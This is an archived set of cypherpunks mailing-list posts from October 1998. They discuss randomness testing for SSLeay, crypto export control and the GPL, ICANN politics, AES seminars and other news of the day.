In-Reply-To: <m0zOxtY-0001eoC@magpie.osa.com.au>
Message-ID: <361484A4.20AC5AD0@email.sps.mot.com>
MIME-Version: 1.0
Content-Type: text/plain



Try Diehard at    http://stat.fsu.edu/~geo/diehard.html

Clifford Heath wrote:

> We have been asked by a customer if we have any tests that demonstrate
> the randomness of the SSLeay random number generator (augmented by some
> sound-card random number seeding that we wrote).
>
> I'd like to find some standard implementation for testing randomness, but
> Schneier offers no help (other than a reference to Knuth Vol 2), and I
> don't know where else to turn.
>
> I realise that cryptographic randomness requires unpredictability, and
> this quality depends upon closed-world assumptions about unknown individuals'
> predictive powers, but we have to live with that.
>
> --
> Clifford Heath                    http://www.osa.com.au/~cjh
> Open Software Associates Limited       mailto:cjh@osa.com.au
> 29 Ringwood Street / PO Box 4414       Phone  +613 9871 1694
> Ringwood VIC 3134      AUSTRALIA       Fax    +613 9871 1711
> ------------------------------------------------------------
> Deploy Applications across the net, see http://www.osa.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Fri, 2 Oct 1998 11:26:24 +0800
To: cypherpunks@cyberpass.net
Subject: The end of The Netly News
Message-ID: <Pine.GSO.3.95.981002092456.16182G-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain





---------- Forwarded message ----------
Date: Fri, 2 Oct 1998 09:24:46 -0700 (PDT)
From: Declan McCullagh <declan@well.com>
To: politech@vorlon.mit.edu
Subject: The end of The Netly News


http://www.freedomforum.org/press/presswatch.asp

   Declan McCullagh is ending his longstanding "Netly News" column and
   leaving Time magazine today because of the magazine's recently
   restructured technology coverage. He will join Wired Oct. 12 as chief
   Washington correspondent. His agreement with Wired lets him continue
   to run the Politech e-mail list, a popular industry source of breaking
   news and analysis on technology and politics. (By Adam Clayton Powell
   III)

http://www.wired.com/news/news/business/story/15373.html

   Time Warner on Thursday quietly shut down Netly News, melding the
   operations of its Internet-beat news service and the online version of
   Time Digital.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard Stallman <rms@santafe.edu>
Date: Fri, 2 Oct 1998 11:14:34 +0800
To: warlord@MIT.EDU
Subject: Re: propose: `cypherpunks license' (Re: Wanted: Twofish source code)
In-Reply-To: <199809281845.TAA18662@server.eternity.org>
Message-ID: <199810021611.KAA24078@wijiji.santafe.edu>
MIME-Version: 1.0
Content-Type: text/plain



    The big issue I see with GPL and Crypto software is that with the GPL
    you cannot add any redistribution restrictions.  The problem is that
    due to the United States export rules, I cannot export Crypto
    software, 

That is true.

	      which means I must legally put a restriction on any Crypto
    code I write.

In general, the fact that action A is illegal does not mean you must
include a requirement in your distribution terms not to do A.  Such a
requirement is superfluous, because A is illegal no matter what you
say about it.  For example, if you distribute email software, you
don't need to state the requirements not to use it for fraud or
harrassment.  They are illegal anyway.

It might be a good idea to include, in crypto software, a notice
informing users that US law forbids export of the software, as a
warning lest they do so unaware that export control covers it; but
this need not have the form of a binding requirement.  It could just
be "for your information".




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard Stallman <rms@santafe.edu>
Date: Fri, 2 Oct 1998 11:13:59 +0800
To: warlord@MIT.EDU
Subject: Re: propose: `cypherpunks license' (Re: Wanted: Twofish source code)
In-Reply-To: <199809281845.TAA18662@server.eternity.org>
Message-ID: <199810021611.KAA24080@wijiji.santafe.edu>
MIME-Version: 1.0
Content-Type: text/plain



It might be best not to develop encryption software in the US.  You
might enjoy working on encryption, but if export control makes it is
hard for the whole world-wide free software community to take
advantage of your work, it would be better to work on something else
not subject to export control, and leave encryption to people outside
the US.  There are plenty of people in other countries interested in
working on encryption.

The GNU replacements for PGP and SSH are being written outside the US,
by people who are not US citizens.  We will import them to the US, but
we will never need to export them.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <anon@ecn.org>
Date: Fri, 2 Oct 1998 03:03:32 +0800
To: rah@shipwright.com
Subject: Re: IP: New ExecOrd: Computer Software Piracy
Message-ID: <199810020825.KAA01800@www.ecn.org>
MIME-Version: 1.0
Content-Type: text/plain



> Source:  US Newswire
> http://www.usnewswire.com/topnews/Current_Releases/1001-125.txt
>
> Clinton Issues Executive Order on Computer Software Piracy
> U.S. Newswire
> 1 Oct 14:10
>
> Clinton Issues Executive Order on Computer Software Piracy
> To: National Desk, Technology Writer
> Contact: White House Press Office, 202-456-2100
>
>   WASHINGTON, Oct. 1 /U.S. Newswire/ -- The following was released
> today by the White House:
>
>                       EXECUTIVE ORDER
>                        - - - - - - -
>                   COMPUTER SOFTWARE PIRACY
>
>     The United States Government is the world's largest purchaser of
> computer-related services and equipment, purchasing more than $20
> billion annually.  At a time when a critical component in discussions
> with our international trading partners concerns their efforts to
> combat piracy of computer software and other intellectual property,
> it is incumbent on the United States to ensure that its own practices
> as a purchaser and user of computer software are beyond reproach.
> Accordingly, by the authority vested in me as President by the
> Constitution and the laws of the United States of America, it is
> hereby ordered as follows:
>
>     Section 1.  Policy.  It shall be the policy of the United States
> Government that each executive agency shall work diligently to
> prevent and combat computer software piracy in order to give effect
> to copyrights associated with computer software by observing the
> relevant provisions of international agreements in effect in the
> United States, including applicable provisions of the World Trade
> Organization Agreement on Trade-Related Aspects of Intellectual
> Property Rights, the Berne Convention for the Protection of Literary
> and Artistic Works, and relevant provisions of Federal law, including
> the Copyright Act.



I suppose this means the USG will decide to retroactively compensate 
Inslaw for their use of the Promis software all these years...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
Date: Fri, 2 Oct 1998 04:22:07 +0800
To: Clifford Heath <cjh@osa.com.au>
Subject: Re: Randomness testing
In-Reply-To: <m0zOxtY-0001eoC@magpie.osa.com.au>
Message-ID: <3614A761.380173E0@stud.uni-muenchen.de>
MIME-Version: 1.0
Content-Type: text/plain



Clifford Heath wrote:
> 
> We have been asked by a customer if we have any tests that demonstrate
> the randomness of the SSLeay random number generator (augmented by some
> sound-card random number seeding that we wrote).
> 
> I'd like to find some standard implementation for testing randomness, but
> Schneier offers no help (other than a reference to Knuth Vol 2), and I
> don't know where else to turn.

I suggest that you do at least Maurer's test which is described
in A. J. Menezes et al. Handbook of Applied Cryptography. The
test is not difficult to code. You could also look at my code in
http://www.stud.uni-muenchen.de/~mok-kong.shen/#paper1 in Fortran.

M. K. Shen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Motyka <mmotyka@lsil.com>
Date: Fri, 2 Oct 1998 14:30:06 +0800
To: cypherpunks@cyberpass.net
Subject: US and Canadian Press Briefings
Message-ID: <361528ED.647E@lsil.com>
MIME-Version: 1.0
Content-Type: text/plain



The assurance that privacy is safe and sound is too consistently
followed by the promise of a workable compromise between personal
privacy and the 'legitimate needs of law enforcement.' I'm not a lawyer
but I don't see any middle ground that accomodates both. Either the 5th
ammendment stands or it falls. What exactly are they planning? They talk
as if the groundwork has already been done and it's merely a matter of
following through. Watch for some wierd stuff tied to a barley crop
subsidy or an EPA appropriation.

Are there other examples of this speech from overseas?

Mike

I can think of only one phrase suited to describe a state where the
civil liberties are defined by the police agencies.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sunder <sunder@brainlink.com>
Date: Fri, 2 Oct 1998 12:54:23 +0800
To: cypherpunks@Algebra.COM
Subject: Y2K: Wired: Your bank account is safe(?)
Message-ID: <36151156.92214CF3@brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain



Date: Tue, 29 Sep 1998 21:48:15 -0400
From: Salvatore Denaro <sal@panix.com>
Subject: y2k: FDIC says that every dollar is safe...

       POL. Monday
           FDIC: BANK BALANCES Y2K PROOF
           Thirty-seven federally insured banks are not ready for Y2K,
           but don't panic. The head of the FDIC says that every single
           dollar will be safe.

http://www.wired.com/news/news/email/explode-infobeat/politics/story/15283.html


--
Salvatore Denaro
sal@panix.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Clifford Heath <cjh@osa.com.au>
Date: Fri, 2 Oct 1998 00:43:50 +0800
To: cypherpunks-unedited@toad.com
Subject: Randomness testing
Message-ID: <m0zOxtY-0001eoC@magpie.osa.com.au>
MIME-Version: 1.0
Content-Type: text/plain



We have been asked by a customer if we have any tests that demonstrate 
the randomness of the SSLeay random number generator (augmented by some
sound-card random number seeding that we wrote).

I'd like to find some standard implementation for testing randomness, but 
Schneier offers no help (other than a reference to Knuth Vol 2), and I
don't know where else to turn.

I realise that cryptographic randomness requires unpredictability, and
this quality depends upon closed-world assumptions about unknown individuals'
predictive powers, but we have to live with that.

-- 
Clifford Heath                    http://www.osa.com.au/~cjh
Open Software Associates Limited       mailto:cjh@osa.com.au
29 Ringwood Street / PO Box 4414       Phone  +613 9871 1694
Ringwood VIC 3134      AUSTRALIA       Fax    +613 9871 1711
------------------------------------------------------------
Deploy Applications across the net, see http://www.osa.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 2 Oct 1998 15:17:55 +0800
To: Digital Bearer Settlement List <cryptography@c2.net, e$@vmeng.com
Subject: Reputations for Sale
Message-ID: <v04011701b23adf173626@[139.167.130.249]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Date: Fri, 02 Oct 1998 09:16:56 -0800
From: "Daniel J. Boone" <djb@alaska.net>
Organization: ROMEA
MIME-Version: 1.0
To: rah@shipwright.com
Subject: Reputations for Sale

Hi, Robert!  Given your interest in reputation capital, I thought you would be
amused to know that right now (9:11 AM Alaska time, 1:11 PM Eastern) there is a
discussion going on at
Http://cgi.ebay.com/aw-cgi/eBayISAPI.dll?MfcISAPICommand=ViewBoard&name=qa
regarding the sale of an online commercial reputation.  Messages on this board
scroll away in about two hours, so if you actually want to look, be quick.

eBay, as you may know, is an online auction site where one can build a
reputation through a numerical feedback mechanism.  Someone is suggesting
building up accounts until they have a respectable feedback level and then
auctioning them off to new sellers who lack the patience to earn feedback the
old-fashioned way.  These are not folks who are clueful, for the most part,
about such issues; it's just a business idea to this guy.  I think it's
fascinating.

Take care --

Daniel

P.S.  If you think this would be of interest to any of your lists, feel free to
repost it.  I'd post it to Cypherpunks, but I'm not currently subscribed there.

=================================================================
Daniel J. Boone                      |	"No man's life, liberty,
Robertson, Monagle & Eastaugh, P.C.  |	 or property is safe when
P.O. Box 21211                       |   the Legislature is in
Juneau, Alaska  99802                |	 session."
                                     |
(907) 586-3340	                     |	 --Judge Gideon J. Tucker
 Fax: 586-6818	                     |	   New York, 1866
=================================================================

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sunder <sunder@brainlink.com>
Date: Fri, 2 Oct 1998 15:15:40 +0800
To: cypherpunks@Algebra.COM
Subject: NT5 Ships 96 years early!!!
Message-ID: <361533DE.7B4DA16C@brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain



Date: Fri, 2 Oct 1998 16:14:15 -0400
From: Salvatore Denaro <sal@panix.com>
Subject: NT5 Ships 96 years early

>From the MS timeline:

http://www.microsoft.com/WindowsNT5/workstation/default.asp

WINDOWS NT SERVER 5.0
DECEMBER 30, 1899 -- Find out about Windows NT Server 5.0 and how it builds 
upon the strengths of version 4.0 to provide a platform that is faster, 
more reliable, and easier to manage.

--
Salvatore Denaro
sal@panix.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 2 Oct 1998 15:18:24 +0800
To: dcsb@ai.mit.edu
Subject: [E-CARM] WIPO Public Meeting w/ Prof. Michael Froomkin
Message-ID: <v04011707b23ae475794f@[139.167.130.249]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


X-Authentication-Warning: c3po.kc-inc.net: majordomo set sender to
owner-e-carm@lists.kc-inc.net using -f
X-Sender: cdt9@pop.cais.net
Mime-Version: 1.0
Date: Fri, 2 Oct 1998 12:20:30 -0400
To: e-carm@c3po.kc-inc.net
From: Ari Schwartz <ari@cdt.org>
Subject: [E-CARM] WIPO Public Meeting w/ Prof. Michael Froomkin
Sender: owner-e-carm@c3po.kc-inc.net
Precedence: bulk


***OPEN INVITATION TO ALL MEMBERS OF THE INTERNET COMMUNITY***

The World Intellectual Property Organization (WIPO) is currently holding a
series of public forums to discuss the intellectual property issues
associated with Internet domain names, including dispute resolution.
Michael Froomkin, Professor of Law at the University of Miami, was
appointed this week to the WIPO experts panel. In order to foster greater
public input into the WIPO process, Professor Froomkin will be holding an
informal open meeting on Monday, October 5th at 9 a.m. to hear comments and
concerns from the public interest community regarding this critical issue.
All interested parties are invited to attend and contribute to this open
discussion.

Meeting with Michael Froomkin, WIPO experts panel member
Monday, October 5 at 9 a.m.
hosted by the Center for Democracy and Technology
1634 Eye Street NW, 11th Floor
Call (202) 637-9800 for further details.






------------------------------------
Ari Schwartz
Policy Analyst
Center for Democracy and Technology
1634 Eye Street NW, Suite 1100
Washington, DC 20006
202 637 9800
fax 202 637 0968
ari@cdt.org
http://www.cdt.org
------------------------------------


===========================================================================
Help with Majordomo commands plus list archives and information is
available through the E-CARM web page at http://www.kc-inc.net/e-carm/.
Sponsored by The Knowledge Connection.
===========================================================================

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 2 Oct 1998 15:33:40 +0800
To: cypherpunks@cyberpass.net
Subject: Take Back the Constitution - the 4th Amendment
Message-ID: <v04011708b23ae69ffb96@[139.167.130.249]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Date: Fri, 2 Oct 1998 16:10:36 -0400 (EDT)
From: ElectPD@earthlink.net
To: rah@shipwright.com
Subject: Take Back the Constitution - the 4th Amendment

	Take back the Constitution!  Eye-catching Fourth Amendment bumper
sticker available.  Bold and daring (as are your constitutional rights).
It reads, "I do not consent to a search of my vehicle, my person or my
residence.  So, don't ask. This individual is protected by the 4th
Amendment."

	Http://home.earthlink.net/~electpd Link shows you  photo of bumper
sticker.  It was created and produced by three Santa Clara County
(California) deputy public defenders.  It measures 15 inches by 3 inches
(very large). Top quality materials and paints.  $2 each or 6 for $10. +$4
for shipping via U.S. mail.  Citizens to Elect Our Public Defender (in
Santa Clara County, California).  P. O. Box 71, San Jose, CA 95103.
(408)996-8473.

	Bumper stickers mailed out same day order received., via first class
mail and in protective envelopes ($1.50 to $3 for postage + $1 for the
envelope - our cost).
___________________________________________________________
If you wish to be removed from the ElectPD future mailings, to include
upcoming  bumper stickers announcements, please reply with "Remove" in the
subject line and your name will be removed from future mailings.

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
Date: Fri, 2 Oct 1998 09:34:49 +0800
To: Jim Burnes <jvb@ssds.com>
Subject: Re: Randomness testing
In-Reply-To: <Pine.LNX.3.96.981002073405.1244C-100000@jb3.fastrans.net>
Message-ID: <3614F088.C3F31857@stud.uni-muenchen.de>
MIME-Version: 1.0
Content-Type: text/plain



Jim Burnes wrote:
> 
> You mean you don't have a copy of Knuth, Vol 2.  For shame!

I suppose Heath meant that there is no codes ready for him to use as
those given in Schneier's book. Some tests in Knuth are in fact not
very trivial to code.

M. K. Shen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 2 Oct 1998 15:31:22 +0800
To: dbs@philodox.com
Subject: WPI Cryptoseminar, Wednesday, 10/7 (fwd)
Message-ID: <v0401170ab23ae75c27ec@[139.167.130.249]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


X-Authentication-Warning: goya.WPI.EDU: christof owned process doing -bs
Date: Fri, 2 Oct 1998 15:30:01 -0400 (EDT)
From: Christof Paar <christof@ece.WPI.EDU>
To: DCSB <dcsb@ai.mit.edu>
Subject: WPI Cryptoseminar, Wednesday, 10/7 (fwd)
MIME-Version: 1.0
Sender: bounce-dcsb@ai.mit.edu
Precedence: bulk
Reply-To: Christof Paar <christof@ece.WPI.EDU>

Here we go again. Our seminar series starts next week on a regular base.
-Christof

-----------------------------------------------------------------------------

       WPI Cryptography and Information Security Seminar

                       Christof Paar, WPI

        REPORT ON THE ADVANCED ENCRYPTION STANDARD, AES


                       Wednesday, October 7
                         4:00 pm,  AK 108
                    (refreshments at 3:45 pm)


It is probably widely known that DES expires as a federal encryption
standard by the end of 1998. Currently NIST is overseeing the development of
a new block cipher, AES, which will become the DES successor.

The development process for AES is highly interesting as it has been (as of
yet) been a public process: Everyone was able to submit candidate algorithms
which are currently publicly reviewed.

My talk will mainly follow the excellent presentations by Miles Smid, who
is with NIST, at the AES1 and CRYPTO '98 conferences in August. I will
briefly review the main requirements for AES and talk about the submitted
algorithms. The talk will conclude with a description of how the AES
selection process will continue.


---------------------------------------------------------------------------
---------------------------------------------------------------------------

DIRECTIONS:

The WPI Cryptoseminar is being held in the Atwater Kent building on the
WPI campus. The Atwater Kent building is at the intersection of West and
Salisbury Street for those coming from outside. Directions to the campus
can be found at http://www.wpi.edu/About/Visitors/directions.html


TALKS IN THE FALL '98 SEMESTER:

8/12  Kris Gaj, George Mason University
      Quantum Computers and Classical Supercomputers as a Threat to
      Existing Ciphers.

10/6  Christof Paar, WPI
      Report on AES

10/14 David Finkel, WPI
      Performance and Security in Web-based Electronic Commerce

10/28 Thomas Blum, WPI
      Efficient FPGA Architectures for Public-Key Algorithms

[other talks to be announced]


See also http://ece.WPI.EDU/Research/crypt/seminar/index.html for
abstracts of some of the talks.


MAILING LIST:

If you want to be added to the mailing list and receive talk announcements
together with abstracts, please send me a short mail. Likewise, if you want
to be removed from the list, just send me a short mail.


Regards,

Christof Paar


*************************************************************************
Christof Paar                   http://ee.wpi.edu/People/faculty/cxp.html
Assistant Professor             email:  christof@ece.wpi.edu
Cryptography Group              phone:  (508) 831 5061
ECE Department, WPI             fax:    (508) 831 5491
100 Institute Road
Worcester, MA 01609, USA
*************************************************************************









For help on using this list (especially unsubscribing), send a message to
"dcsb-request@ai.mit.edu" with one line of text: "help".

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Fri, 2 Oct 1998 19:41:44 +0800
To: Jim Choate <cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: A Number Theory Problem....
In-Reply-To: <199810030016.TAA26844@einstein.ssz.com>
Message-ID: <v03130301b23b23279c35@[209.66.100.149]>
MIME-Version: 1.0
Content-Type: text/plain



At 5:16 PM -0700 10/2/98, Jim Choate wrote:
>There is a desert which is 1000 miles across. There is a camel who can carry
>1000 bananas maximum. The camel eats 1 banana per mile travelled. The camel
>has a total of 3000 bananas to begin with. What is the maximum number of
>bananas that the camel can get across to the other side uneaten?
>

>
>A: 533

Some say 533 and a third.

What was your point in posing this with the answer at the bottom. This
problem shows up in the math newsgroups and is not an interesting CP topic.

--Tim May



Y2K: A good chance to reformat America's hard drive and empty the trash.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
Date: Fri, 2 Oct 1998 11:36:53 +0800
To: cypherpunks@Algebra.COM
Subject: Re: An Extension of My Encryption Algorithm WEAK3
Message-ID: <36150EB7.D2300148@stud.uni-muenchen.de>
MIME-Version: 1.0
Content-Type: text/plain



A reported trouble with the runtime libraries (dll) has be removed.
Those who have downloaded the WEAK binaries before 29th September
please do the downloading once again.

M. K. Shen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 2 Oct 1998 18:03:31 +0800
To: cypherpunks@cyberpass.net
Subject: ICANN (New IANA) as a Pawn in an Economic Struggle Between US and
Message-ID: <v0401170db23b064b6dcc@[139.167.130.249]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Date: Fri, 2 Oct 1998 17:42:56 -0400
Reply-To: cook@cookreport.com
Originator: com-priv@lists.psi.com
Sender: com-priv@lists.psi.com
Precedence: bulk
From: Gordon Cook <cook@cookreport.com>
To: Multiple recipients of list <com-priv@lists.psi.com>
Subject: ICANN (New IANA) as a Pawn in an Economic Struggle Between US and
X-Comment:  Commercialization and Privatization of the Internet

I asked the question a few days ago: what could justify Ira's heavy handed
tactics.  What stakes could be large enough to risk the stability of the
net?  Here is an informed hypothesis based on a 90 minutes conversation
with an expert source in these areas who has a heavy international
background.  (I have also reality checked this hypothesis with several
knowledgable observers.)

I am beginning to get an idea of what is at stake in the larger sense.
Ira, I fear, is using the internet as a pawn in a far bigger game.

The game is is inextricably linked with the privacy statutes of the OECD
and the coming October 23th deadline for American companies doing business
in Europe and data mining on European citizens as part of their ordinary
activities.  It is also inextricably linked with the international
encryption debate.

I have heard credible allegations that the US government is at such
loggerheads with the OECD countries over the use of key recovery encryption
and over the unwillingness of american big business to change its ways of
gathering data on employees, customers, contractors etc that we are coming
to the October 23th deadline with billions of dollars at stake and no
solution.

At the same time Ira has for the past three years focused on his mission
with Tom Kalil and working through the National Economic and Security
Council to setting up the internet as a mechanism for global economic
commerce.....   touting the net as a means on which, in a few year's time,
the majority of the world's economy will depend.

It looks as though Ira's agenda is to do this in such a way that the
internet can be controlled by an American based, incorporated, non profit
public authority set up under American law with a Board, purposefully
established without fiscal restraints and without any oversight or
accountability. And with board members who with a smattering of
international representation can be made as subserviant as possible to the
interests of the large American Corporations.  These Board members, through
the GIP, will be passing the cup to pay for the expenses of establishing
ICANN.  Consider Bill Burrington Director of Law and Public Policy and
Assistant General Counsel at AOL, a company which huge data holdings.  He
is the chair of the Washington DC Internetactive Services Association which
went on to form the Internet Alliance with membership very simalr to GIP.
Burrington is manning the barricades of the companies involved in the
privacy dispute with the oecd.  (Why should Burrington care? Consider AOL's
electronic profiles on its 12 million members) Consider also Andy Sernovitz
of AIM whose members have the same general interests and who helped Barb
Dooley of the CIX sell out the IFWP process.  Did Jon Postel really refuse
to attend the Harvard wrap up meeting or did Ira order him not to?

So even if Ira looks heavy handed -- for this agenda to be used as the
White House intends-- Ira needs to have his ducks in order in time for the
OECD meeting in Canada that begins next week.  He needs to demonstrate that
he has enough power to have rammed through a solution at home.   That is
why things have turned nasty during the last week and why the iron fist is
becoming seen with the incorporation of ICANN even though, by Ira's own
allegedly free process, ICANN should not yet be seen as the winner.

Ira is determined to confront the OECD next week with an Internet that *HE*
and the White House clearly controls and to do so as a bargaining chip to
use in getting our way against the Europeans and Asians and Canadians.....
on the issues of encryption and privacy statutes.  It would be instructive
to see the legal basis of the governments arguments being used to get NSI
to cave.  Could it be that their content might be embarrising?

If SAIC doesn't order NSI to sign Ira's demands by the seventh then Ira and
the white house will not be as in control of the internet, as they need to
demonstrate themselves to be, in order to use the internet as an american
dominated global commerce weapon against the other OECD governments.  The
American view is that with the internet firmly in command of the White
House on American corportate terms, the Asians and Europeans will have no
choice but to back off their privacy and the American encryption demands.

Remember also that Europe is trying to launch the Euro in such a way that
it becomes the world's reserve currency. One would like to know whether the
White House orders are do what ever is necessary to see that this effort
fails.

The Europeans and Asians understand perfectly well the power play that Ira
is engaged in.  They are not surprisingly seething with anger.  American
arrogance could be doing dangerous things.  If we drive Europe and Asia
into an economic and political alliance against us, we all will lose.
Privacy, and the freedom to live our lives without government and corporate
political or economic interference are at stake.

***************************************************************************
The COOK Report on Internet            White House Corrupts Formation of IANA
431 Greenway Ave, Ewing, NJ 08618 USA  Corporation. White Paper a Sham. See
(609) 882-2572 (phone & fax)           http://www.cookreport.com/sellout
cook@cookreport.com                    Index to 6 years of COOK Report, how to
subscribe, exec summaries, special reports, gloss at http://www.cookreport.com
***************************************************************************

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@anon.olymp.org>
Date: Fri, 2 Oct 1998 20:43:07 +0800
To: "Reeza!" <cypherpunks@cyberpass.net
Subject: Re: Why do we need remailers, anyway?
Message-ID: <72e02787804d6b91cb0f0733f08b61a8@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



Reeza! wrote:
> 
> ... the First Adulterer/Purjurer, you question why I
> call him this
> 

No, I'm questioning why you're telling *me* about it.

-- an anonymous AOL32 user




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jukka E Isosaari <jei@zor.hut.fi>
Date: Fri, 2 Oct 1998 10:59:04 +0800
To: cypherpunks-unedited@toad.com
Subject: Re: Randomness testing
In-Reply-To: <m0zOxtY-0001eoC@magpie.osa.com.au>
Message-ID: <Pine.LNX.3.96.981002183806.14656Z-100000@zor.hut.fi>
MIME-Version: 1.0
Content-Type: text/plain



One very easy test is to compress the produced random number binary files
with various compression algorithms or programs. If the data is truly 
random, it should not be possible to achieve any compression. At least
not if you include the compression program data size in the calculation.

Well, I'm not sure whether this is such a good practical test or not.(?)

++ J

On Fri, 2 Oct 1998, Clifford Heath wrote:

> We have been asked by a customer if we have any tests that demonstrate 
> the randomness of the SSLeay random number generator (augmented by some
> sound-card random number seeding that we wrote).
> 
> I'd like to find some standard implementation for testing randomness, but 
> Schneier offers no help (other than a reference to Knuth Vol 2), and I
> don't know where else to turn.
> 
> I realise that cryptographic randomness requires unpredictability, and
> this quality depends upon closed-world assumptions about unknown individuals'
> predictive powers, but we have to live with that.
> 
> -- 
> Clifford Heath                    http://www.osa.com.au/~cjh
> Open Software Associates Limited       mailto:cjh@osa.com.au
> 29 Ringwood Street / PO Box 4414       Phone  +613 9871 1694
> Ringwood VIC 3134      AUSTRALIA       Fax    +613 9871 1711
> ------------------------------------------------------------
> Deploy Applications across the net, see http://www.osa.com
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 2 Oct 1998 18:08:44 +0800
To: <cypherpunks@toad.com
Subject: Re: ICANN (New IANA) as a Pawn in an Economic Struggle Between USand
In-Reply-To: <v04011713b23af248f836@[192.168.0.1]>
Message-ID: <v0401170eb23b06aa842d@[139.167.130.249]>
MIME-Version: 1.0
Content-Type: text/plain



Not to disturb your exegetic reverie, here, Gord, but I asked Mr.
Magaziner, when he spoke at at the Electronic Payments Forum earlier this
month, in front of about 400 or so digital commerce and e$ types, the
following question:

"Given your administration's, um, success, in banning strong foriegn
cryptography, how do you propose to ban it in the United States?"

His answer then was that he was absolutely postively against key escrow or
limits on cryptography of any kind. Besides stealing all my carefully
worded thunder :-), he got a big round of applause. <grumble, grumble
goddamn liberals, grumble, grumble>

He also said that the major reason for the, um, complexity, of US crypto
policy was that the administration's internet commerce types were fighting
the law enforcent types tooth and nail about it.

I want to smash the state as much as the next crypto-anarchist :-), but I
figure this is what is happening. The spooks gave up on this crap long ago,
and it's just the cops standing in front of the steamroller now. Money
trumps crime-FUD, just like it did spook-FUD. F=MA, and all that. :-).


Cheers,
Bob Hettinga

"There's the conspiracy theory of history, where elites conspire to shape
events behind the scenes, the fuck-up theory of history, where elites fuck
up and conspire to cover it behind the scenes, and the fucked-up conspiracy
theory of history, where elites conspire to shape events, fuck up, and
conspire to cover it up behind the scenes. My favorite theory is the
latter."
-- (An as-yet Unremembered) Mizzou History Prof

or, in the spirit of William of Occam,

"Never attribute to conspiracy what can be explained by stupidity." --Jerry
Pournelle




-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
